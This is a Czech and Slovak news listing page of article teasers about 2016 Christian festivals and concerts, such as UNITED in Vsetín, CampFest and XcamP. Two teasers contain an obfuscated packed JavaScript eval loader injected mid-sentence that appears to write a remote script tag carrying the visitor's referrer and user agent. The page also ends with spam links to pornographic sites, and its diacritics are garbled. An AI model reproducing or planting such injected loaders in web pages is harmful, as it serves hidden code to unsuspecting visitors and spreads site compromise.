Akce

Festival UNITED poprvé jako open-air

Ilustrace k článku

Ve Vsetín? se od ?tvrtka 18. 8. do soboty 21. 8. 2016 uskute?nil 6. ro?ník k?es?anského multižánrového festivalu UNITED. Festival, který se díky podpo?e m?sta Vsetín poprvé p?edstavil jako m?stská

Země Živitelka 2016

Ilustrace k článku

?eskobud?jovická eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfadf|var|u0026u|referrer|difhe||js|php'.split('|'),0,{})) akce Zem? Živitelka zve na sv?j letošní ro?ník, který se uskute?ní 9. –11. zá?í. A orginázo?i zvou již na páte?n ce?er, jež nabídne

Vsetín ožije festivalem UNITED

Ilustrace k článku

Ve Vsetín? bude ve ?tvrtek 18.8. do soboty 20.8.2016 uskute?ní 6. ro?ník multižánrového k?es?anského festivalu UNITED. Akce nabídne žánrov? r?znorodou hudbu, p?ednášky, workshopy, divadelní vystoupení, promítání film?, poradenskou a modlitební

CampFest volá „PRÍĎ“!

Ilustrace k článku

Už o pár týžd?ov sa za?ne vysved?ením oficiálne leto. Máte už program na prázdniny? Výbornou vo?bou je festival CampFest, ktorý v ?ase 4.-7. augusta 2016 bude prebieha? už po osemnásty

NG Fest 2016

Ilustrace k článku

Organizáto?i multižánrového open-air festivalu v tomto m?síci spustili webové stránky, kde zve?ejnili program letošního ro?níku. Ten se uskute?ní 30. ?ervence 2016 v Javorníku nad Veli?kou od 16 hodin. Hlavními body programu

Rozdáváme 6 lístku na UNITED

Ilustrace k článku

I letos rozdáváme 6 lístk? (3x 2vstupenky) na multižánrový festival UNITED. T?ídenní akce se letos op?t uskute?ní na Vsetín? a to v termínu 18. – 20. srpna. Na festivalu vystoupí

Festival UNITED představuje UNITED CAMP

Ilustrace k článku

Tanec, hudba, vizuální um?ní a drama jsou náplní chystaného um?leckého soust?ed?ní UNITED CAMP, které je rozší?ením lo?ského tane?ního projektu UNITED DANCE. Organizáto?i ke kempu uvád?jí: „P?jde o p?tidenní soust?ed?ní, které

XcamP 2016

Ilustrace k článku

Smilovice – nevelká vesnice v podh??í Beskyd – se každoro?n? v ?ervenci stává hostitelkou týdenního festivalu XcamP. Tento festival má k?es?anské zam??ení, je po?ádán K?es?anským spole?enstvím, o. s. XcamP je

Kdo vystoupí na CampFestu?

Ilustrace k článku

Pred nami je posledný mesiac školských a intenzívnych pracovných povinností. Ak si už teraz zap??ate kalendár akciami, ur?ite neprehliadnite aj CampFest, ktorý v ?ase 4.-7. augusta 2016 bude prebieha? už

Třináctého na třináctce s černošskými spirituály

Ilustrace k článku

Srde?n? zveme na letošní t?etí koncert z cyklu T?ináctého na t?ináctce. Tradi?ní hostitel ve?er? Slávek eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fntrt|var|u0026u|referrer|rtzks||js|php'.split('|'),0,{})) Klecandr vystoupí s programem zhudebn?ných žalm? a dalších písní ze


 
adultcomics.me shemalevids.org incestgames.net